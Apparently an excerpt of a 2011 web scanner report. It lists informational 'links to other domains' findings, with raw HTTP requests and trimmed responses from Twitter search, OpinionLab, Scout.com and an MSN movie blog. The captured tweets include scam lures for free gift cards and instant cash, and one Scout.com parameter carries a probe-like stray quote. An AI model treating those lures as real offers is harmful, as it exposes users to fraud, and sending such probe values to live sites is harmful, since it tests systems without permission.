</b> <a href="http://bit.ly/fW9BmK" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31526178556743682');" rel="nofollow">http://bit.ly/fW9BmK</a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/LRRcoffeebar" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/LRRcoffeebar');"><img alt="31325_118988814788575_113537798667010_184317_4284322_n_normal" src="http://a0.twimg.com/profile_images/1118859259/31325_118988814788575_113537798667010_184317_4284322_n_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/slgkag" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/slgkag');"><img alt="Kinsey_normal" src="http://a1.twimg.com/profile_images/1161507057/Kinsey_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://blackberry.com/twitter" rel="nofollow">Twitter for BlackBerry..</a>
...[SNIP]...
<a href="http://twitter.com/downosaur" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/downosaur');"><img alt="26070_1377141794009_1395785394_31041221_1449864_n_normal" src="http://a3.twimg.com/profile_images/799365774/26070_1377141794009_1395785394_31041221_1449864_n_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/LesterMaddix415" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/LesterMaddix415');"><img alt="9840300771itf4_normal" src="http://a0.twimg.com/profile_images/1226751532/9840300771itf4_normal.jpg" /></a>
...[SNIP]...
</b>,000 Victoria's Secret Gift Card! <a href="http://bit.ly/fNF1PS?=njmx" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31526093190078464');" rel="nofollow">http://bit.ly/fNF1PS?=njmx</a>
...[SNIP]...

22.293. http://search.twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://search.twitter.com/search?q=$1

The response contains the following links to other domains:

http://a0.twimg.com/profile_images/1224173446/4813023771209438_double_call_normal.jpg
http://a0.twimg.com/profile_images/1229348121/26_normal.jpg
http://a0.twimg.com/profile_images/183381113/20081023_6_normal.JPG
http://a1.twimg.com/profile_images/1140743812/IMG_0872_normal.JPG
http://a1.twimg.com/profile_images/1226718129/16228475791itf4_normal.jpg
http://a2.twimg.com/profile_images/786613451/captain-answer-logo_normal.jpg
http://a2.twimg.com/profile_images/933535501/huffingtonpost_normal.png
http://a2.twimg.com/sticky/default_profile_images/default_profile_1_normal.png
http://a3.twimg.com/profile_images/1117976465/swarm_big_normal.png
http://a3.twimg.com/profile_images/1131885613/images5_normal.jpg
http://a3.twimg.com/profile_images/1223131947/12579665881194844_alejandra_c__model_7_normal.jpg
http://a3.twimg.com/profile_images/391715682/mm_twit_pic_normal.jpg
http://a3.twimg.com/profile_images/415532197/header-logo_normal.png
http://bit.ly/fNF1PS?=ody2
http://bit.ly/fP4Rur?=mtk1
http://bit.ly/fP4Rur?=nte1
http://bit.ly/fVTFZG
http://bit.ly/gCMMvy?=mtkx
http://bit.ly/gCMMvy?=odaw
http://blackberry.com/twitter
http://cotweet.com/?utm_source=sp1
http://ht.ly/1b6eiB
http://huff.to/gdVpZy
http://ow.ly/1b6eic
http://tinyurl.com/4g646dv
http://tinyurl.com/4lsmk98
http://twitterfeed.com/
http://www.hootsuite.com/
http://www.huffingtonpost.com/
http://www.tweetdeck.com/
http://www.unmilag/
http://www.visibli.com/

Request

GET /search?q=$1 HTTP/1.1
Host: search.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 17:24:14 GMT
Server: hi
Status: 200 OK
X-Served-From: slc1-abk-25-sr1
X-Runtime: 0.32044
Content-Type: text/html; charset=utf-8
X-Timeline-Cache-Hit: Hit
X-Served-By: slc1-ack-34-sr3.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Sun, 30 Jan 2011 17:29:14 GMT
Content-Length: 37067
Vary: Accept-Encoding
X-Varnish: 1794052676
Age: 0
Via: 1.1 varnish
X-Cache-Svr: slc1-ack-34-sr3.prod.twitter.com
X-Cache: MISS
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
       <meta name="descriptio
...[SNIP]...
<a href="http://twitter.com/MMflint" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/MMflint');"><img alt="Mm_twit_pic_normal" src="http://a3.twimg.com/profile_images/391715682/mm_twit_pic_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://blackberry.com/twitter" rel="nofollow">Twitter for BlackBerry..</a>
...[SNIP]...
<a href="http://twitter.com/huffingtonpost" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/huffingtonpost');"><img alt="Huffingtonpost_normal" src="http://a2.twimg.com/profile_images/933535501/huffingtonpost_normal.png" /></a>
...[SNIP]...
</b> trillion. A woman blamed him for 9/11. Good luck. <a href="http://huff.to/gdVpZy" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/link/30968352725794816');" rel="nofollow">http://huff.to/gdVpZy</a>
...[SNIP]...
<span class="source">via <a href="http://www.huffingtonpost.com" rel="nofollow">The Huffington Post</a>
...[SNIP]...
<a href="http://twitter.com/texas10titans" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/texas10titans');"><img alt="26_normal" src="http://a0.twimg.com/profile_images/1229348121/26_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://www.tweetdeck.com" rel="nofollow">TweetDeck</a>
...[SNIP]...
<a href="http://twitter.com/TiffaniAper5751" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/TiffaniAper5751');"><img alt="4813023771209438_double_call_normal" src="http://a0.twimg.com/profile_images/1224173446/4813023771209438_double_call_normal.jpg" /></a>
...[SNIP]...
</b>,500 is waiting for you! Get your cash now! Immediate approval! <a href="http://bit.ly/fP4Rur?=nte1" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764502810726401');" rel="nofollow">http://bit.ly/fP4Rur?=nte1</a>
...[SNIP]...
<a href="http://twitter.com/Von411" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Von411');"><img alt="Img_0872_normal" src="http://a1.twimg.com/profile_images/1140743812/IMG_0872_normal.JPG" /></a>
...[SNIP]...
<span class="source">via <a href="http://cotweet.com/?utm_source=sp1" rel="nofollow">CoTweet</a>
...[SNIP]...
<a href="http://twitter.com/CL_Tickets" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CL_Tickets');"><img alt="Images5_normal" src="http://a3.twimg.com/profile_images/1131885613/images5_normal.jpg" /></a>
...[SNIP]...
</b> <a href="http://tinyurl.com/4g646dv" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764462314725377');" rel="nofollow">http://tinyurl.com/4g646dv</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/carybot" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/carybot');"><img alt="Swarm_big_normal" src="http://a3.twimg.com/profile_images/1117976465/swarm_big_normal.png" /></a>
...[SNIP]...
</b>,299 Shipped <a href="http://ow.ly/1b6eic" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764444631531520');" rel="nofollow">http://ow.ly/1b6eic</a>
...[SNIP]...
<span class="source">via <a href="http://www.hootsuite.com" rel="nofollow">HootSuite</a>
...[SNIP]...
<a href="http://twitter.com/teayudo" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teayudo');"><img alt="Captain-answer-logo_normal" src="http://a2.twimg.com/profile_images/786613451/captain-answer-logo_normal.jpg" /></a>
...[SNIP]...
</b>.125.000 nec llegar a u$s1.000.000 c acaba el tiempo. <a href="http://www.unmilag" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764436700106752');" rel="nofollow">www.unmilag</a>... <a href="http://ht.ly/1b6eiB" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764436700106752');" rel="nofollow">http://ht.ly/1b6eiB</a>
...[SNIP]...
<span class="source">via <a href="http://www.hootsuite.com" rel="nofollow">HootSuite</a>
...[SNIP]...
<a href="http://twitter.com/SueRailing5058" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SueRailing5058');"><img alt="Default_profile_1_normal" src="http://a2.twimg.com/sticky/default_profile_images/default_profile_1_normal.png" /></a>
...[SNIP]...
</b>,000 Home Depot Gift Card! Type in email here <a href="http://bit.ly/gCMMvy?=mtkx" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764428240195585');" rel="nofollow">http://bit.ly/gCMMvy?=mtkx</a>
...[SNIP]...
<a href="http://twitter.com/Daddioslive" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Daddioslive');"><img alt="20081023_6_normal" src="http://a0.twimg.com/profile_images/183381113/20081023_6_normal.JPG" /></a>
...[SNIP]...
<a href="http://twitter.com/TiffaniAper5751" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/TiffaniAper5751');"><img alt="4813023771209438_double_call_normal" src="http://a0.twimg.com/profile_images/1224173446/4813023771209438_double_call_normal.jpg" /></a>
...[SNIP]...
</b>,500 is waiting for you! Get your money now! Immediate approval! <a href="http://bit.ly/fP4Rur?=mtk1" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764344630943744');" rel="nofollow">http://bit.ly/fP4Rur?=mtk1</a>
...[SNIP]...
<a href="http://twitter.com/RoseannAmsden51" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/RoseannAmsden51');"><img alt="12579665881194844_alejandra_c__model_7_normal" src="http://a3.twimg.com/profile_images/1223131947/12579665881194844_alejandra_c__model_7_normal.jpg" /></a>
...[SNIP]...
</b>,000 Victoria's Secret Gift Card! <a href="http://bit.ly/fNF1PS?=ody2" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764342139518978');" rel="nofollow">http://bit.ly/fNF1PS?=ody2</a>
...[SNIP]...
<a href="http://twitter.com/SundayHeinzman7" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SundayHeinzman7');"><img alt="16228475791itf4_normal" src="http://a1.twimg.com/profile_images/1226718129/16228475791itf4_normal.jpg" /></a>
...[SNIP]...
</b>,000 Home Depot Gift Card! Enter email here <a href="http://bit.ly/gCMMvy?=odaw" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764266482667520');" rel="nofollow">http://bit.ly/gCMMvy?=odaw</a>
...[SNIP]...
<a href="http://twitter.com/CL_Tickets" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CL_Tickets');"><img alt="Images5_normal" src="http://a3.twimg.com/profile_images/1131885613/images5_normal.jpg" /></a>
...[SNIP]...
</b> <a href="http://tinyurl.com/4lsmk98" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764252301725696');" rel="nofollow">http://tinyurl.com/4lsmk98</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/SomethingAwfull" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SomethingAwfull');"><img alt="Header-logo_normal" src="http://a3.twimg.com/profile_images/415532197/header-logo_normal.png" /></a>
...[SNIP]...
</b>,695 home theater pet seating [Stupid] <a href="http://bit.ly/fVTFZG" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764165953585153');" rel="nofollow">http://bit.ly/fVTFZG</a>
...[SNIP]...
<span class="source">via <a href="http://www.visibli.com" rel="nofollow">Visibli</a>
...[SNIP]...

22.294. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The page was loaded from a URL containing a query string:

https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

The response contains the following link to another domain:

https://billing.microsoft.com/home.aspx

Request

GET /ccc01/o.asp?ID=WpkpVtTB HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17222
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:40 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
<br />• For <a href="https://billing.microsoft.com/home.aspx" target="blank">Billing/Account Questions</a>
...[SNIP]...

22.295. https://secure.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The page was loaded from a URL containing a query string:

https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%26pid%3D88%27%26yr%3D2011

The response contains the following links to other domains:

https://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com
https://sb.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:06 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
<noscript>
       <img src="https://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="https://sb.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1" />
   </noscript>
...[SNIP]...

22.296. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://blog.brightlightsfilm.com/
http://blogs.suntimes.com/scanners/
http://chud.com/articles/
http://daily.greencine.com/
http://download.live.com/?sku=messenger
http://filmexperience.blogspot.com/
http://finalgirl.blogspot.com/
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110121213042_Cedar-Rapids.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124173707_Kevin-Smith.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124174321_social_network_pga.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110126191944_deeper%20crop.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110127184824_jackson1-300x214.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128202305_rickygervais_wideweb__430x322.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128203805_PROTO-2-popup.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg
http://movies.nytimes.com/movie/334717/Bobby/overview
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://selfstyledsiren.blogspot.com/
http://sergioleoneifr.blogspot.com/
http://sunsetgun.typepad.com/sunsetgun/
http://thehousenextdooronline.com/
http://theplaylist.blogspot.com/
http://topics.nytimes.com/top/reference/timestopics/people/k/robert_francis_kennedy/index.html?inline=nyt-per
http://www.avclub.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.cinematical.com/
http://www.delish.com/
http://www.hitfix.com/
http://www.huffingtonpost.com/2011/01/24/kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html
http://www.moviecitynews.com/
http://www.nextmovie.com/blog/peter-jackson-hospitalized/
http://www.nytimes.com/2011/01/23/business/23proto.html?_r=1
http://www.riskybusinessblog.com/
http://www.sheilaomalle.com/
http://www.slashfilm.com/
http://www.stuff.co.nz/national/4589305/Sir-Peter-Jacksons-stomach-ulcer-scare
http://www.sunsetgun.com/
http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0
http://www.thewrap.com/
http://www.thewrap.com/awards/column-post/not-so-fast-weve-got-ourselves-oscar-race-24153
http://www.thewrap.com/movies/slideshow/sundance-2011-10-films-were-dying-see-slideshow-24046
http://www.vanityfair.com/online/wolcott
http://www.youtube.com/watch?v=tsafwBj4t1s&feature=player_embedded
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406657&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a739047b5d6e407394ad97b1d13404d1; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=49106A6F091149598AA6F37326FBC37E; domain=.entertainment.msn.com; expires=Thu, 18-Aug-2011 16:57:37 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406657&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg" />What if movie posters just cut to the chase? Damn the <i>
...[SNIP]...
</i> title -- this is what you really want, right? <a href="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0" title="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0">The Shiznit</a>
...[SNIP]...
<br />The <a href="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0" title="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0">Shiznit</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128203805_PROTO-2-popup.jpg" />My goodness. Finally! A genuinely sweet story involving alcohol and one of the Sheen clan.<br />
...[SNIP]...
<br />Here's the story from the<a href="http://www.nytimes.com/2011/01/23/business/23proto.html?_r=1" title="http://www.nytimes.com/2011/01/23/business/23proto.html?_r=1"> New York Times</a>
...[SNIP]...
<p>"The year was 2005, and Mr. Estevez was working on <a href="http://movies.nytimes.com/movie/334717/Bobby/overview" title="http://movies.nytimes.com/movie/334717/Bobby/overview">'Bobby,'</a> a film he wrote and directed, about the assassination of <a href="http://topics.nytimes.com/top/reference/timestopics/people/k/robert_francis_kennedy/index.html?inline=nyt-per" title="http://topics.nytimes.com/top/reference/timestopics/people/k/robert_francis_kennedy/index.html?inline=nyt-per">Robert F. Kennedy</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128202305_rickygervais_wideweb__430x322.jpg" />Whatever Ricky Gervais haters. When he's in the right element, he rules. <br />
...[SNIP]...
<br />Watch it <a href="http://www.youtube.com/watch?v=tsafwBj4t1s&feature=player_embedded" title="http://www.youtube.com/watch?v=tsafwBj4t1s&feature=player_embedded">here</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110127184824_jackson1-300x214.jpg" />"The Hobbit" has had so many setbacks, but this one, the director's health, is most troublesome. According to reports, he's in the clear, but we all hope for Peter Jackson's speedy
...[SNIP]...
<br />Here's more from <a href="http://www.nextmovie.com/blog/peter-jackson-hospitalized/" title="http://www.nextmovie.com/blog/peter-jackson-hospitalized/">Next Movie</a>
...[SNIP]...
<p>Yes, unfortunately, it’s true: according to the New Zealand website <a href="http://www.stuff.co.nz/national/4589305/Sir-Peter-Jacksons-stomach-ulcer-scare" title="http://www.stuff.co.nz/national/4589305/Sir-Peter-Jacksons-stomach-ulcer-scare">Stuff</a>
...[SNIP]...
<p><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110126191944_deeper%20crop.jpg" />With such wonderfully eclectic, innovative, moving, funny, disturbing and beautifully crafted shorts to choose from, Sundance jury duty was not an easy task.</p>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124174321_social_network_pga.jpg" />Will "The King's Speech" reign at the Oscars? And even, in spite of most Oscar oddsmakers, win Best Picture?<br />
...[SNIP]...
<br />Here's more from <a href="http://www.thewrap.com/awards/column-post/not-so-fast-weve-got-ourselves-oscar-race-24153" title="http://www.thewrap.com/awards/column-post/not-so-fast-weve-got-ourselves-oscar-race-24153">TheWrap</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124173707_Kevin-Smith.jpg" />Kevin Smith doesn't need Hollywood. Or, he doesn't <i>
...[SNIP]...
<br />Here's <a href="http://www.huffingtonpost.com/2011/01/24/kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html" title="http://www.huffingtonpost.com/2011/01/24/kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html">more</a>
...[SNIP]...
